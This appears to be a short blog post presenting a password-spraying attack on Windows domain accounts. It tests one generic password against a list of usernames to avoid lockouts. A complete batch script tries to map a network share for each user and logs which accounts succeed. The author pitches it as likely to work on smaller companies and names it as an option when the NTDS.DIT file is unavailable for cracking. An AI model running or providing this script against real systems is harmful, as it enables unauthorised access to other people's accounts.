Generic Password Guessing With a BAT File

Yes, it is possible to break into a user account using nothing but a bat file and a list of names.

Quite frequently sequentially failed login attempts result in an account lock for 15 minutes. This is an irritation as it means it cannot be brute forced… HOWEVER

Given a list of names and a singular password, we can try every single user name we have on file, and test it against one password. This will result in no account lockouts. It may however trip any SIEM/IDS/IPS, but for smaller companies this is likely to work a treat.

We simply need one file in the same location as the bat file named ‘userlist.txt’. The results file will be created automatically. Essentially all this script does is attempt to connect to a share I know that everyone should have access to. It attempts to map a drive under their name with the generic password of ‘password123’.

If the bat file detects that f:/ is successfully mapped, it will log the success in the results folder.

This attack is useful if you do not have access to the AD NTDS.DIT file for cracking in JTR.

@ECHO OFF
 if exist f:\ (
 net use f: /delete
 )
 echo Successes>results.txt
 echo ###########>>results.txt

 for /F "tokens=1" %%i in (userlist.txt) do call :process %%i
 goto thenextstep
 :process
 set VAR1=%1

 net use f: \\127.0.0.1\testShare /USER:abyz\%1 password123

 if exist f:\ (
 echo %1>>results.txt
 net use f: /delete
 echo %1
 )

 goto :EOF

net use f: /delete


Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Google+ photo

You are commenting using your Google+ account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s